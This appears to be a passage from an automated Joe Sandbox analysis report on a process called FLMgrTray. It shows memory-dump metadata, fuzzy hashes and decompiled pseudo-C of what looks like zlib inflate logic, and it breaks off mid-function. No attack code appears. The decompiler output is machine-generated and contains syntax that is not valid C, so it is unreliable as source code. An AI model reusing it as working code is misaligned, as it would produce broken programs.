                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturnmemmovememset
                                                                                        • String ID:
                                                                                        • API String ID: 2637902645-0
                                                                                        • Opcode ID: 24486131baa729dc275e2452c82faa5ce21d8a572374623c9bcfaf003019756d
                                                                                        • Instruction ID: 1020040cd3ce70d06c3d30b73aa1d828fb2a54c4fa395604814265d7da4d7330
                                                                                        • Opcode Fuzzy Hash: 24486131baa729dc275e2452c82faa5ce21d8a572374623c9bcfaf003019756d
                                                                                        • Instruction Fuzzy Hash: 06113471900248ABDB14EF68CD457AEBBB4EF05720F50861EE825AB3C1D775AB44CBD1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00175703: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(2C80D730,?,00163245,2C80D730,?,string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000), ref: 00175718
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0018E218,000000FF,?,00161213), ref: 00163235
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturnmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1104909994-0
                                                                                        • Opcode ID: e69ebed7046a14cba198a9efbc4786b312b52c39a604eba6a049e6cd56cd0913
                                                                                        • Instruction ID: e859505cc6b09d0472736804d33f19e3cb4683724d4e07a271d62820a09a2116
                                                                                        • Opcode Fuzzy Hash: e69ebed7046a14cba198a9efbc4786b312b52c39a604eba6a049e6cd56cd0913
                                                                                        • Instruction Fuzzy Hash: DAF02BB25116084AE70CD770AC15A3B33D99FA0320754823FF42DC65D1D731EAB5C255
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 71%
                                                                                        			E00188DE3(signed int __ebx, unsigned int __edx, void* __edi, signed int __esi) {
                                                                                        				signed int _t954;
                                                                                        				void* _t959;
                                                                                        				signed int _t963;
                                                                                        				signed int _t965;
                                                                                        				signed int _t969;
                                                                                        				void* _t973;
                                                                                        				intOrPtr _t975;
                                                                                        				intOrPtr _t977;
                                                                                        				signed int _t1007;
                                                                                        				signed char _t1008;
                                                                                        				signed char _t1014;
                                                                                        				signed int _t1015;
                                                                                        				signed int _t1037;
                                                                                        				intOrPtr _t1038;
                                                                                        				intOrPtr _t1039;
                                                                                        				void* _t1048;
                                                                                        				void** _t1049;
                                                                                        				signed int _t1056;
                                                                                        				signed int _t1057;
                                                                                        				signed int _t1058;
                                                                                        				signed int _t1059;
                                                                                        				void* _t1064;
                                                                                        
                                                                                        				L0:
                                                                                        				while(1) {
                                                                                        					L0:
                                                                                        					_t1048 = __edi;
                                                                                        					_t1007 = __ebx;
                                                                                        					_t1014 = __esi & 0x00000007;
                                                                                        					_t1056 = __esi - _t1014;
                                                                                        					_t1037 = __edx >> _t1014;
                                                                                        					 *(_t1064 - 8) = _t1037;
                                                                                        					 *(_t1064 - 0x18) = _t1056;
                                                                                        					if(_t1056 >= 0x20) {
                                                                                        						goto L168;
                                                                                        					} else {
                                                                                        						goto L166;
                                                                                        					}
                                                                                        					while(1) {
                                                                                        						L166:
                                                                                        						if(__ebx == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						L167:
                                                                                        						__esi = __esi + 8;
                                                                                        						__ebx = __ebx - 1;
                                                                                        						 *(__ebp - 0x18) = __esi;
                                                                                        						__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        						 *(__ebp - 0x10) = __ebx;
                                                                                        						__edi = __edi + 1;
                                                                                        						 *(__ebp - 8) = __edx;
                                                                                        						 *(__ebp - 0x14) = __edi;
                                                                                        						if(__esi < 0x20) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							goto L168;
                                                                                        						}
                                                                                        						L360:
                                                                                        					}
                                                                                        					L101:
                                                                                        					_t959 =  *(_t1064 - 0x10);
                                                                                        					L102:
                                                                                        					_t1038 =  *((intOrPtr*)(_t1064 + 0xc));
                                                                                        					L103:
                                                                                        					_t1049 =  *(_t1064 + 8);
                                                                                        					_t1008 =  *(_t1064 - 0xc);
                                                                                        					_t1049[3] =  *(_t1064 - 0x24);
                                                                                        					_t1049[4] =  *(_t1064 - 0x1c);
                                                                                        					_t1049[1] = _t959;
                                                                                        					 *_t1049 =  *(_t1064 - 0x14);
                                                                                        					 *(_t1008 + 0x40) = _t1056;
                                                                                        					_t1057 =  *(_t1064 - 0x28);
                                                                                        					 *(_t1008 + 0x3c) =  *(_t1064 - 8);
                                                                                        					if( *(_t1008 + 0x2c) != 0) {
                                                                                        						L108:
                                                                                        						_t963 = E00189F70(_t1049, _t1049[3], _t1057 - _t1049[4]); // executed
                                                                                        						if(_t963 == 0) {
                                                                                        							goto L345;
                                                                                        						} else {
                                                                                        							L109:
                                                                                        							 *((intOrPtr*)(_t1008 + 4)) = 0x3f52;
                                                                                        							L110:
                                                                                        							return 0xfffffffc;
                                                                                        						}
                                                                                        					} else {
                                                                                        						L104:
                                                                                        						if(_t1057 == _t1049[4]) {
                                                                                        							L345:
                                                                                        							_t965 =  *(_t1064 - 0x38) - _t1049[1];
                                                                                        							_t1058 = _t1057 - _t1049[4];
                                                                                        							_t1049[2] = _t1049[2] + _t965;
                                                                                        							_t1049[5] = _t1049[5] + _t1058;
                                                                                        							 *((intOrPtr*)(_t1008 + 0x20)) =  *((intOrPtr*)(_t1008 + 0x20)) + _t1058;
                                                                                        							 *(_t1064 - 0x38) = _t965;
                                                                                        							 *(_t1064 - 0x28) = _t1058;
                                                                                        							if(( *(_t1008 + 0xc) & 0x00000004) != 0) {
                                                                                        								if(_t1058 != 0) {
                                                                                        									_t939 = _t1008 + 0x1c; // 0x10482bff
                                                                                        									_push(_t1058);
                                                                                        									_push(_t1049[3] - _t1058);
                                                                                        									_push( *_t939);
                                                                                        									if( *(_t1008 + 0x14) == 0) {
                                                                                        										_t973 = E0018A060();
                                                                                        									} else {
                                                                                        										_t973 = E0018BB60();
                                                                                        									}
                                                                                        									 *(_t1008 + 0x1c) = _t973;
                                                                                        									_t1049[0xc] = _t973;
                                                                                        								}
                                                                                        							}
                                                                                        							_t943 = _t1008 + 4; // 0x830a7cfc
                                                                                        							_t1039 =  *_t943;
                                                                                        							if(_t1039 == 0x3f47) {
                                                                                        								L354:
                                                                                        								_t1059 = 0x100;
                                                                                        							} else {
                                                                                        								L352:
                                                                                        								if(_t1039 == 0x3f42) {
                                                                                        									goto L354;
                                                                                        								} else {
                                                                                        									L353:
                                                                                        									_t1059 = 0;
                                                                                        								}
                                                                                        							}
                                                                                        							L355:
                                                                                        							_t944 = _t1008 + 8; // 0x497efdfe
                                                                                        							 *(_t1064 + 8) = 0x80;
                                                                                        							asm("sbb ecx, ecx");
                                                                                        							_t967 =  ==  ?  *(_t1064 + 8) : 0;
                                                                                        							_t1022 = ( ~( *_t944) & 0x00000040) + ( ==  ?  *(_t1064 + 8) : 0);
                                                                                        							_t947 = _t1008 + 0x40; // 0x33fc4d8b
                                                                                        							_t1023 = ( ~( *_t944) & 0x00000040) + ( ==  ?  *(_t1064 + 8) : 0) +  *_t947;
                                                                                        							_t1024 = ( ~( *_t944) & 0x00000040) + ( ==  ?  *(_t1064 + 8) : 0) +  *_t947 + _t1059;
                                                                                        							_t1049[0xb] = ( ~( *_t944) & 0x00000040) + ( ==  ?  *(_t1064 + 8) : 0) +  *_t947 + _t1059;
                                                                                        							if( *(_t1064 - 0x38) != 0) {
                                                                                        								L357:
                                                                                        								if( *((intOrPtr*)(_t1064 + 0xc)) != 4) {
                                                                                        									L359:
                                                                                        									return  *(_t1064 - 0x30);
                                                                                        								} else {
                                                                                        									goto L358;
                                                                                        								}
                                                                                        							} else {
                                                                                        								L356:
                                                                                        								if( *(_t1064 - 0x28) == 0) {
                                                                                        									L358:
                                                                                        									_t969 =  *(_t1064 - 0x30);
                                                                                        									_t970 =  ==  ? 0xfffffffb : _t969;
                                                                                        									return  ==  ? 0xfffffffb : _t969;
                                                                                        								} else {
                                                                                        									goto L357;
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							L105:
                                                                                        							_t262 = _t1008 + 4; // 0x830a7cfc
                                                                                        							_t975 =  *_t262;
                                                                                        							if(_t975 >= 0x3f51) {
                                                                                        								goto L345;
                                                                                        							} else {
                                                                                        								L106:
                                                                                        								if(_t975 < 0x3f4e) {
                                                                                        									goto L108;
                                                                                        								} else {
                                                                                        									L107:
                                                                                        									if(_t1038 == 4) {
                                                                                        										goto L345;
                                                                                        									} else {
                                                                                        										goto L108;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					goto L360;
                                                                                        					L168:
                                                                                        					_t1015 = _t1037 & 0x0000ffff;
                                                                                        					 *(_t1064 - 0x3c) = _t1015;
                                                                                        					_t1014 =  *(_t1064 - 0xc);
                                                                                        					if(_t1015 ==  !_t1037 >> 0x10) {
                                                                                        						L170:
                                                                                        						_t1037 = 0;
                                                                                        						_t1056 = 0;
                                                                                        						 *(_t1014 + 0x44) =  *(_t1064 - 0x3c);
                                                                                        						 *(_t1064 - 8) = 0;
                                                                                        						 *(_t1064 - 0x18) = 0;
                                                                                        						 *(_t1014 + 4) = 0x3f42;
                                                                                        						if( *((intOrPtr*)(_t1064 + 0xc)) == 6) {
                                                                                        							goto L101;
                                                                                        						} else {
                                                                                        							goto L171;
                                                                                        						}
                                                                                        					} else {
                                                                                        						L169:
                                                                                        						( *(_t1064 + 8))[6] = "invalid stored block lengths";
                                                                                        						 *(_t1014 + 4) = 0x3f51;
                                                                                        						while(1) {
                                                                                        							L263:
                                                                                        							_t712 = _t1014 + 4; // 0x830a7cfc
                                                                                        							_t977 =  *_t712;
                                                                                        							 *((intOrPtr*)(_t1064 - 0x2c)) = _t977;
                                                                                        							_t954 = _t977 + 0xffffc0cc;
                                                                                        							if(_t954 > 0x1e) {
                                                                                        								break;
                                                                                        							}
                                                                                        							L1:
                                                                                        							switch( *((intOrPtr*)(_t954 * 4 +  &M00189BC0))) {
                                                                                        								case 0:
                                                                                        									L2:
                                                                                        									_t978 =  *(_t1014 + 0xc);
                                                                                        									 *(_t1064 - 0x3c) = _t978;
                                                                                        									if(_t978 != 0) {
                                                                                        										L4:
                                                                                        										__eflags = _t1056 - 0x10;
                                                                                        										if(_t1056 >= 0x10) {
                                                                                        											L8:
                                                                                        											__eflags = _t978 & 0x00000002;
                                                                                        											if((_t978 & 0x00000002) == 0) {
                                                                                        												L13:
                                                                                        												_t979 =  *(_t1014 + 0x24);
                                                                                        												 *(_t1014 + 0x14) = 0;
                                                                                        												__eflags = _t979;
                                                                                        												if(_t979 != 0) {
                                                                                        													 *(_t979 + 0x30) = 0xffffffff;
                                                                                        												}
                                                                                        												L15:
                                                                                        												_t980 =  *(_t1014 + 0xc);
                                                                                        												__eflags = _t980 & 0x00000001;
                                                                                        												if((_t980 & 0x00000001) == 0) {
                                                                                        													L25:
                                                                                        													( *(_t1064 + 8))[6] = "incorrect header check";
                                                                                        													 *(_t1014 + 4) = 0x3f51;
                                                                                        												} else {
                                                                                        													L16:
                                                                                        													_t984 = (_t1037 >> 8) + ((_t1037 & 0x000000ff) << 8);
                                                                                        													_t1014 =  *(_t1064 - 0xc);
                                                                                        													__eflags = _t984 % 0x1f;
                                                                                        													_t1037 =  *(_t1064 - 8);
                                                                                        													if(_t984 % 0x1f != 0) {
                                                                                        														goto L25;
                                                                                        													} else {
                                                                                        														L17:
                                                                                        														__eflags = (_t1037 & 0x0000000f) - 8;
                                                                                        														if((_t1037 & 0x0000000f) == 8) {
                                                                                        															_t43 = _t1014 + 0x28; // 0x8b0473ff
                                                                                        															_t1054 =  *_t43;
                                                                                        															_t1056 = _t1056 - 4;
                                                                                        															_t1037 = _t1037 >> 4;
                                                                                        															 *(_t1064 - 0x34) = _t1054;
                                                                                        															 *(_t1064 - 8) = _t1037;
                                                                                        															_t990 = (_t1037 & 0x0000000f) + 8;
                                                                                        															 *(_t1064 - 0x18) = _t1056;
                                                                                        															__eflags = _t1054;
                                                                                        															 *(_t1064 - 0x3c) = _t990;
                                                                                        															_t1048 =  *(_t1064 - 0x14);
                                                                                        															if(_t1054 == 0) {
                                                                                        																 *(_t1014 + 0x28) = _t990;
                                                                                        																 *(_t1064 - 0x34) = _t990;
                                                                                        															}
                                                                                        															L21:
                                                                                        															__eflags = _t990 - 0xf;
                                                                                        															if(_t990 > 0xf) {
                                                                                        																L24:
                                                                                        																( *(_t1064 + 8))[6] = "invalid window size";
                                                                                        																 *(_t1014 + 4) = 0x3f51;
                                                                                        															} else {
                                                                                        																L22:
                                                                                        																__eflags = _t990 -  *(_t1064 - 0x34);
                                                                                        																if(_t990 >  *(_t1064 - 0x34)) {
                                                                                        																	goto L24;
                                                                                        																} else {
                                                                                        																	_push(0);
                                                                                        																	 *( *(_t1064 - 0xc) + 0x18) = 1 <<  *(_t1064 - 0x3c);
                                                                                        																	_t994 = E0018A060(0, 0);
                                                                                        																	_t1014 =  *(_t1064 - 0xc);
                                                                                        																	 *(_t1014 + 0x1c) = _t994;
                                                                                        																	( *(_t1064 + 8))[0xc] = _t994;
                                                                                        																	 *(_t1014 + 4) =  !( *(_t1064 - 8) >> 8) & 0x00000002 | 0x00003f3d;
                                                                                        																	_t1037 = 0;
                                                                                        																	_t1056 = 0;
                                                                                        																	 *(_t1064 - 8) = 0;
                                                                                        																	 *(_t1064 - 0x18) = 0;
                                                                                        																}
                                                                                        															}
                                                                                        														} else {
                                                                                        															goto L18;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												L9:
                                                                                        												__eflags = _t1037 - 0x8b1f;
                                                                                        												if(_t1037 != 0x8b1f) {
                                                                                        													goto L13;
                                                                                        												} else {
                                                                                        													__eflags =  *(_t1014 + 0x28);
                                                                                        													if( *(_t1014 + 0x28) == 0) {
                                                                                        														 *(_t1014 + 0x28) = 0xf;
                                                                                        													}
                                                                                        													_push(0);
                                                                                        													_push(0);
                                                                                        													_t996 = E0018BB60(0);
                                                                                        													_t1032 =  *(_t1064 - 0xc);
                                                                                        													_push(2);
                                                                                        													 *((intOrPtr*)(_t1032 + 0x1c)) = _t996;
                                                                                        													_push(_t1064 - 0x20);
                                                                                        													 *((short*)(_t1064 - 0x20)) = 0x8b1f;
                                                                                        													_t22 = _t1032 + 0x1c; // 0x10482bff
                                                                                        													_t998 = E0018BB60( *_t22);
                                                                                        													_t1014 =  *(_t1064 - 0xc);
                                                                                        													_t1037 = 0;
                                                                                        													_t1056 = 0;
                                                                                        													 *(_t1064 - 8) = 0;
                                                                                        													 *(_t1064 - 0x18) = 0;
                                                                                        													 *(_t1014 + 0x1c) = _t998;
                                                                                        													 *(_t1014 + 4) = 0x3f35;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L263;
                                                                                        										} else {
                                                                                        											while(1) {
                                                                                        												L5:
                                                                                        												__eflags = _t1007;
                                                                                        												if(_t1007 == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L6:
                                                                                        												_t1000 = ( *_t1048 & 0x000000ff) << _t1056;
                                                                                        												_t1056 = _t1056 + 8;
                                                                                        												_t1007 = _t1007 - 1;
                                                                                        												 *(_t1064 - 0x18) = _t1056;
                                                                                        												_t1037 = _t1037 + _t1000;
                                                                                        												 *(_t1064 - 0x10) = _t1007;
                                                                                        												_t1048 = _t1048 + 1;
                                                                                        												 *(_t1064 - 8) = _t1037;
                                                                                        												 *(_t1064 - 0x14) = _t1048;
                                                                                        												__eflags = _t1056 - 0x10;
                                                                                        												if(_t1056 < 0x10) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													_t1014 =  *(_t1064 - 0xc);
                                                                                        													_t978 =  *(_t1064 - 0x3c);
                                                                                        													goto L8;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									} else {
                                                                                        										 *(_t1014 + 4) = 0x3f40;
                                                                                        										goto L263;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 1:
                                                                                        									L26:
                                                                                        									__eflags = __esi - 0x10;
                                                                                        									if(__esi >= 0x10) {
                                                                                        										L31:
                                                                                        										 *(__ecx + 0x14) = __edx;
                                                                                        										__eflags = __dl - 8;
                                                                                        										if(__dl != 8) {
                                                                                        											L18:
                                                                                        											( *(_t1064 + 8))[6] = "unknown compression method";
                                                                                        											 *(_t1014 + 4) = 0x3f51;
                                                                                        											goto L263;
                                                                                        										} else {
                                                                                        											L32:
                                                                                        											__eflags = __edx & 0x0000e000;
                                                                                        											if((__edx & 0x0000e000) == 0) {
                                                                                        												__esi =  *(__ecx + 0x24);
                                                                                        												__eax = __edx;
                                                                                        												__eax = __edx >> 8;
                                                                                        												 *(__ebp - 0x34) = __edx;
                                                                                        												 *(__ebp - 0x3c) = __eax;
                                                                                        												__eflags = __esi;
                                                                                        												if(__esi != 0) {
                                                                                        													__eax = __eax & 0x00000001;
                                                                                        													__eflags = __eax;
                                                                                        													 *__esi = __eax;
                                                                                        													__eax =  *(__ecx + 0x14);
                                                                                        													 *(__ebp - 0x34) =  *(__ecx + 0x14);
                                                                                        													__eax =  *(__ebp - 0x3c);
                                                                                        												}
                                                                                        												__eflags =  *(__ebp - 0x34) & 0x00000200;
                                                                                        												if(( *(__ebp - 0x34) & 0x00000200) != 0) {
                                                                                        													__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        													if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        														 *(__ebp - 0x1f) = __al;
                                                                                        														__eax = __ebp - 0x20;
                                                                                        														_push(2);
                                                                                        														_push(__ebp - 0x20);
                                                                                        														 *(__ebp - 0x20) = __dl;
                                                                                        														__eax = E0018BB60( *(__ecx + 0x1c));
                                                                                        														__ecx =  *(__ebp - 0xc);
                                                                                        														 *(__ecx + 0x1c) = __eax;
                                                                                        													}
                                                                                        												}
                                                                                        												__edx = 0;
                                                                                        												 *(__ecx + 4) = 0x3f36;
                                                                                        												 *(__ebp - 8) = 0;
                                                                                        												__esi = 0;
                                                                                        												goto L41;
                                                                                        											} else {
                                                                                        												__eax =  *(__ebp + 8);
                                                                                        												 *( *(__ebp + 8) + 0x18) = "unknown header flags set";
                                                                                        												 *(__ecx + 4) = 0x3f51;
                                                                                        												goto L263;
                                                                                        											}
                                                                                        										}
                                                                                        									} else {
                                                                                        										asm("o16 nop [eax+eax]");
                                                                                        										while(1) {
                                                                                        											L28:
                                                                                        											__eflags = __ebx;
                                                                                        											if(__ebx == 0) {
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											L29:
                                                                                        											__eax =  *__edi & 0x000000ff;
                                                                                        											__ecx = __esi;
                                                                                        											__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        											__esi = __esi + 8;
                                                                                        											__ebx = __ebx - 1;
                                                                                        											 *(__ebp - 0x18) = __esi;
                                                                                        											__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											__edi = __edi + 1;
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											__eflags = __esi - 0x10;
                                                                                        											if(__esi < 0x10) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												goto L31;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        										}
                                                                                        										goto L101;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 2:
                                                                                        									L40:
                                                                                        									__eflags = __esi - 0x20;
                                                                                        									if(__esi >= 0x20) {
                                                                                        										L44:
                                                                                        										_t104 = __ecx + 0x24; // 0x5051ffff
                                                                                        										__eax =  *_t104;
                                                                                        										__eflags = __eax;
                                                                                        										if(__eax != 0) {
                                                                                        											 *(__eax + 4) = __edx;
                                                                                        										}
                                                                                        										__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        										if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        											__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        											if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        												__eax = __edx;
                                                                                        												 *(__ebp - 0x20) = __dl;
                                                                                        												__eax = __edx >> 8;
                                                                                        												 *(__ebp - 0x1f) = __al;
                                                                                        												__edx = __edx >> 0x10;
                                                                                        												 *(__ebp - 0x1e) = __al;
                                                                                        												__eax = __ebp - 0x20;
                                                                                        												_push(4);
                                                                                        												__eflags = __edx;
                                                                                        												_push(__ebp - 0x20);
                                                                                        												 *(__ebp - 0x1d) = __dl;
                                                                                        												_t117 = __ecx + 0x1c; // 0x10482bff
                                                                                        												__eax = E0018BB60( *_t117);
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												 *(__ecx + 0x1c) = __eax;
                                                                                        											}
                                                                                        										}
                                                                                        										__edx = 0;
                                                                                        										 *(__ecx + 4) = 0x3f37;
                                                                                        										 *(__ebp - 8) = 0;
                                                                                        										__esi = 0;
                                                                                        										goto L51;
                                                                                        									} else {
                                                                                        										while(1) {
                                                                                        											L41:
                                                                                        											__eflags = __ebx;
                                                                                        											if(__ebx == 0) {
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											L42:
                                                                                        											__eax =  *__edi & 0x000000ff;
                                                                                        											__ecx = __esi;
                                                                                        											__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        											__ebx = __ebx - 1;
                                                                                        											__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											__edi = __edi + 1;
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											__esi = __esi + 8;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											__eflags = __esi - 0x20;
                                                                                        											if(__esi < 0x20) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												L43:
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												goto L44;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        										}
                                                                                        										goto L101;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 3:
                                                                                        									L50:
                                                                                        									__eflags = __esi - 0x10;
                                                                                        									if(__esi >= 0x10) {
                                                                                        										L54:
                                                                                        										_t126 = __ecx + 0x24; // 0x5051ffff
                                                                                        										__esi =  *_t126;
                                                                                        										 *(__ebp - 0x34) = __edx >> 8;
                                                                                        										__eflags = __esi;
                                                                                        										if(__esi != 0) {
                                                                                        											__eax = __dl & 0x000000ff;
                                                                                        											 *(__esi + 8) = __dl & 0x000000ff;
                                                                                        											_t129 = __ecx + 0x24; // 0x5051ffff
                                                                                        											__eax =  *_t129;
                                                                                        											__esi =  *(__ebp - 0x34);
                                                                                        											 *( *_t129 + 0xc) = __esi;
                                                                                        											__eax = __esi;
                                                                                        										}
                                                                                        										__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        										if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        											__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        											if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        												 *(__ebp - 0x1f) = __al;
                                                                                        												__eax = __ebp - 0x20;
                                                                                        												_push(2);
                                                                                        												_push(__ebp - 0x20);
                                                                                        												 *(__ebp - 0x20) = __dl;
                                                                                        												_t141 = __ecx + 0x1c; // 0x10482bff
                                                                                        												__eax = E0018BB60( *_t141);
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												 *(__ecx + 0x1c) = __eax;
                                                                                        											}
                                                                                        										}
                                                                                        										__edx = 0;
                                                                                        										 *(__ecx + 4) = 0x3f38;
                                                                                        										__esi = 0;
                                                                                        										__eflags = 0;
                                                                                        										 *(__ebp - 8) = 0;
                                                                                        										 *(__ebp - 0x18) = 0;
                                                                                        										goto L60;
                                                                                        									} else {
                                                                                        										while(1) {
                                                                                        											L51:
                                                                                        											__eflags = __ebx;
                                                                                        											if(__ebx == 0) {
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											L52:
                                                                                        											__eax =  *__edi & 0x000000ff;
                                                                                        											__ecx = __esi;
                                                                                        											__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        											__ebx = __ebx - 1;
                                                                                        											__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											__edi = __edi + 1;
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											__esi = __esi + 8;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											__eflags = __esi - 0x10;
                                                                                        											if(__esi < 0x10) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												L53:
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												goto L54;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        										}
                                                                                        										goto L101;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 4:
                                                                                        									L60:
                                                                                        									__eflags =  *(__ecx + 0x14) & 0x00000400;
                                                                                        									if(( *(__ecx + 0x14) & 0x00000400) == 0) {
                                                                                        										L71:
                                                                                        										_t171 = __ecx + 0x24; // 0x5051ffff
                                                                                        										__eax =  *_t171;
                                                                                        										__eflags = __eax;
                                                                                        										if(__eax != 0) {
                                                                                        											 *(__eax + 0x10) = 0;
                                                                                        										}
                                                                                        										goto L73;
                                                                                        									} else {
                                                                                        										L61:
                                                                                        										__eflags = __esi - 0x10;
                                                                                        										if(__esi >= 0x10) {
                                                                                        											L65:
                                                                                        											_t154 = __ecx + 0x24; // 0x5051ffff
                                                                                        											__eax =  *_t154;
                                                                                        											 *(__ecx + 0x44) = __edx;
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												 *(__eax + 0x14) = __edx;
                                                                                        											}
                                                                                        											__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        											if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        												__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        												if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        													 *(__ebp - 0x20) = __dl;
                                                                                        													__eax = __ebp - 0x20;
                                                                                        													_push(2);
                                                                                        													__eflags = __edx;
                                                                                        													_push(__ebp - 0x20);
                                                                                        													 *(__ebp - 0x1f) = __dl;
                                                                                        													_t166 = __ecx + 0x1c; // 0x10482bff
                                                                                        													__eax = E0018BB60( *_t166);
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													 *(__ecx + 0x1c) = __eax;
                                                                                        												}
                                                                                        											}
                                                                                        											__esi = 0;
                                                                                        											 *(__ebp - 8) = 0;
                                                                                        											 *(__ebp - 0x18) = 0;
                                                                                        											L73:
                                                                                        											 *(__ecx + 4) = 0x3f39;
                                                                                        											goto L74;
                                                                                        										} else {
                                                                                        											while(1) {
                                                                                        												L62:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L63:
                                                                                        												__eax =  *__edi & 0x000000ff;
                                                                                        												__ecx = __esi;
                                                                                        												__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        												__ebx = __ebx - 1;
                                                                                        												__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        												 *(__ebp - 0x10) = __ebx;
                                                                                        												__edi = __edi + 1;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												__esi = __esi + 8;
                                                                                        												 *(__ebp - 0x14) = __edi;
                                                                                        												__eflags = __esi - 0x10;
                                                                                        												if(__esi < 0x10) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													L64:
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													goto L65;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 5:
                                                                                        									L74:
                                                                                        									_t174 = __ecx + 0x14; // 0xfff84d8d
                                                                                        									__eax =  *_t174;
                                                                                        									__eflags = __eax & 0x00000400;
                                                                                        									if((__eax & 0x00000400) == 0) {
                                                                                        										L87:
                                                                                        										 *(__ecx + 0x44) = 0;
                                                                                        										 *(__ecx + 4) = 0x3f3a;
